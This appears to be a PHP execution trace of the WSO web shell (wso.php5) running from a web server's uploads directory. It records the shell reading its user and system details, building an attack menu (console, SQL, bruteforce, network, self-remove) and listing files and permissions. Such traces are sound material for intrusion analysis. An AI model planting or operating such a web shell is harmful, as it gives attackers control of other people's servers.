4	46	0	0.005850	888912	posix_geteuid	0		/var/www/html/uploads/wso.php5	241	0
4	46	1	0.005864	888912
4	46	R			33
4	47	0	0.005877	888912	posix_getpwuid	0		/var/www/html/uploads/wso.php5	241	1	33
4	47	1	0.005924	889744
4	47	R			['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
3		A						/var/www/html/uploads/wso.php5	241	$uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
4	48	0	0.005970	889712	posix_getegid	0		/var/www/html/uploads/wso.php5	242	0
4	48	1	0.005983	889712
4	48	R			33
4	49	0	0.005996	889712	posix_getgrgid	0		/var/www/html/uploads/wso.php5	242	1	33
4	49	1	0.006025	890376
4	49	R			['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
3		A						/var/www/html/uploads/wso.php5	242	$gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
3		A						/var/www/html/uploads/wso.php5	243	$user = 'www-data'
3		A						/var/www/html/uploads/wso.php5	244	$uid = 33
3		A						/var/www/html/uploads/wso.php5	245	$group = 'www-data'
3		A						/var/www/html/uploads/wso.php5	246	$gid = 33
3		A						/var/www/html/uploads/wso.php5	249	$cwd_links = ''
4	50	0	0.006113	888992	explode	0		/var/www/html/uploads/wso.php5	250	2	'/'	'/var/www/html/uploads/'
4	50	1	0.006129	889600
4	50	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3		A						/var/www/html/uploads/wso.php5	250	$path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3		A						/var/www/html/uploads/wso.php5	251	$n = 6
3		A						/var/www/html/uploads/wso.php5	252	$i = 0
3		A						/var/www/html/uploads/wso.php5	253	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3		A						/var/www/html/uploads/wso.php5	254	$j = 0
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= '/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	256	$cwd_links .= '")\'>/</a>'
3		A						/var/www/html/uploads/wso.php5	252	$i++
3		A						/var/www/html/uploads/wso.php5	253	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3		A						/var/www/html/uploads/wso.php5	254	$j = 0
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= '/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= 'var/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	256	$cwd_links .= '")\'>var/</a>'
3		A						/var/www/html/uploads/wso.php5	252	$i++
3		A						/var/www/html/uploads/wso.php5	253	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3		A						/var/www/html/uploads/wso.php5	254	$j = 0
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= '/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= 'var/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= 'www/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	256	$cwd_links .= '")\'>www/</a>'
3		A						/var/www/html/uploads/wso.php5	252	$i++
3		A						/var/www/html/uploads/wso.php5	253	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3		A						/var/www/html/uploads/wso.php5	254	$j = 0
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= '/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= 'var/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= 'www/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= 'html/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	256	$cwd_links .= '")\'>html/</a>'
3		A						/var/www/html/uploads/wso.php5	252	$i++
3		A						/var/www/html/uploads/wso.php5	253	$cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3		A						/var/www/html/uploads/wso.php5	254	$j = 0
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= '/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= 'var/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= 'www/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= 'html/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	255	$cwd_links .= 'uploads/'
3		A						/var/www/html/uploads/wso.php5	254	$j++
3		A						/var/www/html/uploads/wso.php5	256	$cwd_links .= '")\'>uploads/</a>'
3		A						/var/www/html/uploads/wso.php5	252	$i++
3		A						/var/www/html/uploads/wso.php5	259	$charsets = [0 => 'UTF-8', 1 => 'Windows-1251', 2 => 'KOI8-R', 3 => 'KOI8-U', 4 => 'cp866']
3		A						/var/www/html/uploads/wso.php5	260	$opt_charsets = ''
3		A						/var/www/html/uploads/wso.php5	262	$opt_charsets .= '<option value="UTF-8" >UTF-8</option>'
3		A						/var/www/html/uploads/wso.php5	262	$opt_charsets .= '<option value="Windows-1251" selected>Windows-1251</option>'
3		A						/var/www/html/uploads/wso.php5	262	$opt_charsets .= '<option value="KOI8-R" >KOI8-R</option>'
3		A						/var/www/html/uploads/wso.php5	262	$opt_charsets .= '<option value="KOI8-U" >KOI8-U</option>'
3		A						/var/www/html/uploads/wso.php5	262	$opt_charsets .= '<option value="cp866" >cp866</option>'
3		A						/var/www/html/uploads/wso.php5	264	$m = ['Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network']
3		A						/var/www/html/uploads/wso.php5	267	$m['Self remove'] = 'SelfRemove'
3		A						/var/www/html/uploads/wso.php5	268	$menu = ''
3		A						/var/www/html/uploads/wso.php5	269	$k = 'Sec. Info'
3		A						/var/www/html/uploads/wso.php5	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'SecInfo\',null,\'\',\'\',\'\')">Sec. Info</a> ]</th>'
3		A						/var/www/html/uploads/wso.php5	269	$k = 'Files'
3		A						/var/www/html/uploads/wso.php5	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">Files</a> ]</th>'
3		A						/var/www/html/uploads/wso.php5	269	$k = 'Console'
3		A						/var/www/html/uploads/wso.php5	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Console\',null,\'\',\'\',\'\')">Console</a> ]</th>'
3		A						/var/www/html/uploads/wso.php5	269	$k = 'Sql'
3		A						/var/www/html/uploads/wso.php5	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Sql\',null,\'\',\'\',\'\')">Sql</a> ]</th>'
3		A						/var/www/html/uploads/wso.php5	269	$k = 'Php'
3		A						/var/www/html/uploads/wso.php5	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Php\',null,\'\',\'\',\'\')">Php</a> ]</th>'
3		A						/var/www/html/uploads/wso.php5	269	$k = 'String tools'
3		A						/var/www/html/uploads/wso.php5	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'StringTools\',null,\'\',\'\',\'\')">String tools</a> ]</th>'
3		A						/var/www/html/uploads/wso.php5	269	$k = 'Bruteforce'
3		A						/var/www/html/uploads/wso.php5	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Bruteforce\',null,\'\',\'\',\'\')">Bruteforce</a> ]</th>'
3		A						/var/www/html/uploads/wso.php5	269	$k = 'Network'
3		A						/var/www/html/uploads/wso.php5	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Network\',null,\'\',\'\',\'\')">Network</a> ]</th>'
3		A						/var/www/html/uploads/wso.php5	269	$k = 'Self remove'
3		A						/var/www/html/uploads/wso.php5	270	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'SelfRemove\',null,\'\',\'\',\'\')">Self remove</a> ]</th>'
3		A						/var/www/html/uploads/wso.php5	272	$drives = ''
4	51	0	0.007038	891888	php_uname	0		/var/www/html/uploads/wso.php5	279	0
4	51	1	0.007053	892000
4	51	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4	52	0	0.007078	892000	substr	0		/var/www/html/uploads/wso.php5	279	3	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'	0	120
4	52	1	0.007097	892096
4	52	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4	53	0	0.007118	892144	phpversion	0		/var/www/html/uploads/wso.php5	279	0
4	53	1	0.007130	892208
4	53	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
4	54	0	0.007147	892336	date	0		/var/www/html/uploads/wso.php5	280	1	'Y-m-d H:i:s'
4	54	1	0.007230	894688
4	54	R			'2023-02-12 23:33:22'
4	55	0	0.007251	894528	wsoViewSize	1		/var/www/html/uploads/wso.php5	280	1	232015802368
5	56	0	0.007267	894528	sprintf	0		/var/www/html/uploads/wso.php5	338	2	'%1.2f'	216.08155441284
5	56	1	0.007284	894912
5	56	R			'216.08'
4	55	1	0.007298	894568
4	55	R			'216.08 GB'
4	57	0	0.007313	894528	wsoViewSize	1		/var/www/html/uploads/wso.php5	280	1	193245057024
5	58	0	0.007326	894528	sprintf	0		/var/www/html/uploads/wso.php5	338	2	'%1.2f'	179.97348403931
5	58	1	0.007340	894912
5	58	R			'179.97'
4	57	1	0.007354	894568
4	57	R			'179.97 GB'
4	59	0	0.007370	894784	wsoPermsColor	1		/var/www/html/uploads/wso.php5	280	1	'/var/www/html/uploads/'
5	60	0	0.007385	894784	is_readable	0		/var/www/html/uploads/wso.php5	369	1	'/var/www/html/uploads/'
5	60	1	0.007410	894824
5	60	R			TRUE
5	61	0	0.007423	894784	is_writable	0		/var/www/html/uploads/wso.php5	371	1	'/var/www/html/uploads/'
5	61	1	0.007439	894824
5	61	R			TRUE
5	62	0	0.007453	894784	fileperms	0		/var/www/html/uploads/wso.php5	374	1	'/var/www/html/uploads/'
5	62	1	0.007470	894848
5	62	R			16895
5	63	0	0.007483	894808	wsoPerms	1		/var/www/html/uploads/wso.php5	374	1	16895
5		A						/var/www/html/uploads/wso.php5	352	$i = 'd'
5		A						/var/www/html/uploads/wso.php5	356	$i .= 'r'
5		A						/var/www/html/uploads/wso.php5	357	$i .= 'w'
5		A						/var/www/html/uploads/wso.php5	358	$i .= 'x'
5		A						/var/www/html/uploads/wso.php5	359	$i .= 'r'
5		A						/var/www/html/uploads/wso.php5	360	$i .= 'w'
5		A						/var/www/html/uploads/wso.php5	361	$i .= 'x'
5		A						/var/www/html/uploads/wso.php5	362	$i .= 'r'
5		A						/var/www/html/uploads/wso.php5	363	$i .= 'w'
5		A						/var/www/html/uploads/wso.php5	364	$i .= 'x'
5	63	1	0.007591	894848
5	63	R			'drwxrwxrwx'
4	59	1	0.007605	894872
4	59	R			'<font color=#25ff00>drwxrwxrwx</font>'
3	27	1	0.007636	890920
3	64	0	0.007646	890920	wsoScandir	1		/var/www/html/uploads/wso.php5	638	1	'/var/www/html/uploads/'
4	65	0	0.007659	890920	function_exists	0		/var/www/html/uploads/wso.php5	378	1	'scandir'
4	65	1	0.007672	890960
4	65	R			TRUE
4	66	0	0.007685	890920	scandir	0		/var/www/html/uploads/wso.php5	379	1	'/var/www/html/uploads/'
4	66	1	0.007722	891544
4	66	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'wso.php5']
3	64	1	0.007744	891512
3	64	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'wso.php5']
2		A						/var/www/html/uploads/wso.php5	638	$dirContent = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'wso.php5']
2		A						/var/www/html/uploads/wso.php5	641	$sort = [0 => 'name', 1 => 1]
2		A						/var/www/html/uploads/wso.php5	655	$files = []
2		A						/var/www/html/uploads/wso.php5	655	$dirs = []
2		A						/var/www/html/uploads/wso.php5	656	$n = 6
2		A						/var/www/html/uploads/wso.php5	657	$i = 0
3	67	0	0.007835	891536	fileowner	0		/var/www/html/uploads/wso.php5	658	1	'.'
3	67	1	0.007850	891560
3	67	R			0
3	68	0	0.007862	891520	posix_getpwuid	0		/var/www/html/uploads/wso.php5	658	1	0
3	68	1	0.007889	892320
3	68	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/wso.php5	658	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	69	0	0.007928	892288	filegroup	0		/var/www/html/uploads/wso.php5	659	1	'.'
3	69	1	0.007941	892328
3	69	R			0
3	70	0	0.007953	892288	posix_getgrgid	0		/var/www/html/uploads/wso.php5	659	1	0
3	70	1	0.007982	892944
3	70	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/wso.php5	659	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	71	0	0.008017	893384	filemtime	0		/var/www/html/uploads/wso.php5	662	1	'/var/www/html/uploads/.'
3	71	1	0.008033	893440
3	71	R			1676262802
3	72	0	0.008046	893352	date	0		/var/www/html/uploads/wso.php5	662	2	'Y-m-d H:i:s'	1676262802
3	72	1	0.008078	893680
3	72	R			'2023-02-12 23:33:22'
3	73	0	0.008093	893656	wsoPermsColor	1		/var/www/html/uploads/wso.php5	663	1	'/var/www/html/uploads/.'
4	74	0	0.008106	893656	is_readable	0		/var/www/html/uploads/wso.php5	369	1	'/var/www/html/uploads/.'
4	74	1	0.008122	893696
4	74	R			TRUE
4	75	0	0.008164	893656	is_writable	0		/var/www/html/uploads/wso.php5	371	1	'/var/www/html/uploads/.'
4	75	1	0.008180	893696
4	75	R			TRUE
4	76	0	0.008193	893656	fileperms	0		/var/www/html/uploads/wso.php5	374	1	'/var/www/html/uploads/.'
4	76	1	0.008206	893696
4	76	R			16895
4	77	0	0.008219	893656	wsoPerms	1		/var/www/html/uploads/wso.php5	374	1	16895
4		A						/var/www/html/uploads/wso.php5	352	$i = 'd'
4		A						/var/www/html/uploads/wso.php5	356	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	357	$i .= 'w'
4		A						/var/www/html/uploads/wso.php5	358	$i .= 'x'
4		A						/var/www/html/uploads/wso.php5	359	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	360	$i .= 'w'
4		A						/var/www/html/uploads/wso.php5	361	$i .= 'x'
4		A						/var/www/html/uploads/wso.php5	362	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	363	$i .= 'w'
4		A						/var/www/html/uploads/wso.php5	364	$i .= 'x'
4	77	1	0.008327	893696
4	77	R			'drwxrwxrwx'
3	73	1	0.008341	893720
3	73	R			'<font color=#25ff00>drwxrwxrwx</font>'
3	78	0	0.008358	893720	filesize	0		/var/www/html/uploads/wso.php5	664	1	'/var/www/html/uploads/.'
3	78	1	0.008371	893760
3	78	R			4096
2		A						/var/www/html/uploads/wso.php5	666	$tmp = ['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
3	79	0	0.008406	893720	is_file	0		/var/www/html/uploads/wso.php5	668	1	'/var/www/html/uploads/.'
3	79	1	0.008419	893760
3	79	R			FALSE
3	80	0	0.008433	893720	is_link	0		/var/www/html/uploads/wso.php5	670	1	'/var/www/html/uploads/.'
3	80	1	0.008447	893784
3	80	R			FALSE
3	81	0	0.008461	893744	is_dir	0		/var/www/html/uploads/wso.php5	672	1	'/var/www/html/uploads/.'
3	81	1	0.008473	893784
3	81	R			TRUE
2		A						/var/www/html/uploads/wso.php5	657	$i++
3	82	0	0.008496	893696	fileowner	0		/var/www/html/uploads/wso.php5	658	1	'..'
3	82	1	0.008510	893720
3	82	R			0
3	83	0	0.008522	893680	posix_getpwuid	0		/var/www/html/uploads/wso.php5	658	1	0
3	83	1	0.008545	894480
3	83	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/wso.php5	658	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	84	0	0.008585	893712	filegroup	0		/var/www/html/uploads/wso.php5	659	1	'..'
3	84	1	0.008598	893752
3	84	R			0
3	85	0	0.008610	893712	posix_getgrgid	0		/var/www/html/uploads/wso.php5	659	1	0
3	85	1	0.008631	894368
3	85	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/wso.php5	659	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	86	0	0.008665	894232	filemtime	0		/var/www/html/uploads/wso.php5	662	1	'/var/www/html/uploads/..'
3	86	1	0.008680	894296
3	86	R			1676262802
3	87	0	0.008693	894200	date	0		/var/www/html/uploads/wso.php5	662	2	'Y-m-d H:i:s'	1676262802
3	87	1	0.008724	894528
3	87	R			'2023-02-12 23:33:22'
3	88	0	0.008738	894512	wsoPermsColor	1		/var/www/html/uploads/wso.php5	663	1	'/var/www/html/uploads/..'
4	89	0	0.008751	894512	is_readable	0		/var/www/html/uploads/wso.php5	369	1	'/var/www/html/uploads/..'
4	89	1	0.008767	894552
4	89	R			TRUE
4	90	0	0.008780	894512	is_writable	0		/var/www/html/uploads/wso.php5	371	1	'/var/www/html/uploads/..'
4	90	1	0.008794	894552
4	90	R			TRUE
4	91	0	0.008807	894512	fileperms	0		/var/www/html/uploads/wso.php5	374	1	'/var/www/html/uploads/..'
4	91	1	0.008824	894552
4	91	R			16895
4	92	0	0.008837	894512	wsoPerms	1		/var/www/html/uploads/wso.php5	374	1	16895
4		A						/var/www/html/uploads/wso.php5	352	$i = 'd'
4		A						/var/www/html/uploads/wso.php5	356	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	357	$i .= 'w'
4		A						/var/www/html/uploads/wso.php5	358	$i .= 'x'
4		A						/var/www/html/uploads/wso.php5	359	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	360	$i .= 'w'
4		A						/var/www/html/uploads/wso.php5	361	$i .= 'x'
4		A						/var/www/html/uploads/wso.php5	362	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	363	$i .= 'w'
4		A						/var/www/html/uploads/wso.php5	364	$i .= 'x'
4	92	1	0.008952	894552
4	92	R			'drwxrwxrwx'
3	88	1	0.008966	894576
3	88	R			'<font color=#25ff00>drwxrwxrwx</font>'
3	93	0	0.008982	894576	filesize	0		/var/www/html/uploads/wso.php5	664	1	'/var/www/html/uploads/..'
3	93	1	0.008995	894616
3	93	R			4096
2		A						/var/www/html/uploads/wso.php5	666	$tmp = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
3	94	0	0.009030	893768	is_file	0		/var/www/html/uploads/wso.php5	668	1	'/var/www/html/uploads/..'
3	94	1	0.009042	893808
3	94	R			FALSE
3	95	0	0.009056	893768	is_link	0		/var/www/html/uploads/wso.php5	670	1	'/var/www/html/uploads/..'
3	95	1	0.009070	893816
3	95	R			FALSE
3	96	0	0.009084	893776	is_dir	0		/var/www/html/uploads/wso.php5	672	1	'/var/www/html/uploads/..'
3	96	1	0.009096	893816
3	96	R			TRUE
3	97	0	0.009109	893720	array_merge	0		/var/www/html/uploads/wso.php5	673	2	['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']	['type' => 'dir']
3	97	1	0.009134	894160
3	97	R			['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2		A						/var/www/html/uploads/wso.php5	673	$dirs[] = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2		A						/var/www/html/uploads/wso.php5	657	$i++
3	98	0	0.009191	894472	fileowner	0		/var/www/html/uploads/wso.php5	658	1	'.htaccess'
3	98	1	0.009206	894496
3	98	R			0
3	99	0	0.009219	894456	posix_getpwuid	0		/var/www/html/uploads/wso.php5	658	1	0
3	99	1	0.009241	895256
3	99	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/wso.php5	658	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	100	0	0.009281	894488	filegroup	0		/var/www/html/uploads/wso.php5	659	1	'.htaccess'
3	100	1	0.009294	894528
3	100	R			0
3	101	0	0.009307	894488	posix_getgrgid	0		/var/www/html/uploads/wso.php5	659	1	0
3	101	1	0.009328	895144
3	101	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/wso.php5	659	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	102	0	0.009362	895008	filemtime	0		/var/www/html/uploads/wso.php5	662	1	'/var/www/html/uploads/.htaccess'
3	102	1	0.009378	895064
3	102	R			1676262802
3	103	0	0.009392	894968	date	0		/var/www/html/uploads/wso.php5	662	2	'Y-m-d H:i:s'	1676262802
3	103	1	0.009423	895296
3	103	R			'2023-02-12 23:33:22'
3	104	0	0.009437	895280	wsoPermsColor	1		/var/www/html/uploads/wso.php5	663	1	'/var/www/html/uploads/.htaccess'
4	105	0	0.009450	895280	is_readable	0		/var/www/html/uploads/wso.php5	369	1	'/var/www/html/uploads/.htaccess'
4	105	1	0.009466	895320
4	105	R			TRUE
4	106	0	0.009479	895280	is_writable	0		/var/www/html/uploads/wso.php5	371	1	'/var/www/html/uploads/.htaccess'
4	106	1	0.009495	895320
4	106	R			FALSE
4	107	0	0.009509	895280	fileperms	0		/var/www/html/uploads/wso.php5	372	1	'/var/www/html/uploads/.htaccess'
4	107	1	0.009521	895320
4	107	R			33188
4	108	0	0.009534	895280	wsoPerms	1		/var/www/html/uploads/wso.php5	372	1	33188
4		A						/var/www/html/uploads/wso.php5	350	$i = '-'
4		A						/var/www/html/uploads/wso.php5	356	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	357	$i .= 'w'
4		A						/var/www/html/uploads/wso.php5	358	$i .= '-'
4		A						/var/www/html/uploads/wso.php5	359	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	360	$i .= '-'
4		A						/var/www/html/uploads/wso.php5	361	$i .= '-'
4		A						/var/www/html/uploads/wso.php5	362	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	363	$i .= '-'
4		A						/var/www/html/uploads/wso.php5	364	$i .= '-'
4	108	1	0.009645	895320
4	108	R			'-rw-r--r--'
3	104	1	0.009659	895344
3	104	R			'<font color=white>-rw-r--r--</font>'
3	109	0	0.009675	895344	filesize	0		/var/www/html/uploads/wso.php5	664	1	'/var/www/html/uploads/.htaccess'
3	109	1	0.009689	895384
3	109	R			64
2		A						/var/www/html/uploads/wso.php5	666	$tmp = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root']
3	110	0	0.009723	894968	is_file	0		/var/www/html/uploads/wso.php5	668	1	'/var/www/html/uploads/.htaccess'
3	110	1	0.009737	895008
3	110	R			TRUE
3	111	0	0.009750	894912	array_merge	0		/var/www/html/uploads/wso.php5	669	2	['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root']	['type' => 'file']
3	111	1	0.009773	895352
3	111	R			['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2		A						/var/www/html/uploads/wso.php5	669	$files[] = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2		A						/var/www/html/uploads/wso.php5	657	$i++
3	112	0	0.009829	895664	fileowner	0		/var/www/html/uploads/wso.php5	658	1	'data'
3	112	1	0.009843	895680
3	112	R			0
3	113	0	0.009856	895640	posix_getpwuid	0		/var/www/html/uploads/wso.php5	658	1	0
3	113	1	0.009878	896440
3	113	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/wso.php5	658	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	114	0	0.009918	895672	filegroup	0		/var/www/html/uploads/wso.php5	659	1	'data'
3	114	1	0.009931	895712
3	114	R			0
3	115	0	0.009943	895672	posix_getgrgid	0		/var/www/html/uploads/wso.php5	659	1	0
3	115	1	0.009964	896328
3	115	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/wso.php5	659	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	116	0	0.009999	896192	filemtime	0		/var/www/html/uploads/wso.php5	662	1	'/var/www/html/uploads/data'
3	116	1	0.010014	896256
3	116	R			1676262802
3	117	0	0.010027	896160	date	0		/var/www/html/uploads/wso.php5	662	2	'Y-m-d H:i:s'	1676262802
3	117	1	0.010058	896488
3	117	R			'2023-02-12 23:33:22'
3	118	0	0.010072	896472	wsoPermsColor	1		/var/www/html/uploads/wso.php5	663	1	'/var/www/html/uploads/data'
4	119	0	0.010085	896472	is_readable	0		/var/www/html/uploads/wso.php5	369	1	'/var/www/html/uploads/data'
4	119	1	0.010101	896512
4	119	R			TRUE
4	120	0	0.010114	896472	is_writable	0		/var/www/html/uploads/wso.php5	371	1	'/var/www/html/uploads/data'
4	120	1	0.010129	896512
4	120	R			TRUE
4	121	0	0.010142	896472	fileperms	0		/var/www/html/uploads/wso.php5	374	1	'/var/www/html/uploads/data'
4	121	1	0.010155	896512
4	121	R			16895
4	122	0	0.010168	896472	wsoPerms	1		/var/www/html/uploads/wso.php5	374	1	16895
4		A						/var/www/html/uploads/wso.php5	352	$i = 'd'
4		A						/var/www/html/uploads/wso.php5	356	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	357	$i .= 'w'
4		A						/var/www/html/uploads/wso.php5	358	$i .= 'x'
4		A						/var/www/html/uploads/wso.php5	359	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	360	$i .= 'w'
4		A						/var/www/html/uploads/wso.php5	361	$i .= 'x'
4		A						/var/www/html/uploads/wso.php5	362	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	363	$i .= 'w'
4		A						/var/www/html/uploads/wso.php5	364	$i .= 'x'
4	122	1	0.010274	896512
4	122	R			'drwxrwxrwx'
3	118	1	0.010288	896536
3	118	R			'<font color=#25ff00>drwxrwxrwx</font>'
3	123	0	0.010309	896536	filesize	0		/var/www/html/uploads/wso.php5	664	1	'/var/www/html/uploads/data'
3	123	1	0.010322	896576
3	123	R			4096
2		A						/var/www/html/uploads/wso.php5	666	$tmp = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
3	124	0	0.010357	896160	is_file	0		/var/www/html/uploads/wso.php5	668	1	'/var/www/html/uploads/data'
3	124	1	0.010370	896200
3	124	R			FALSE
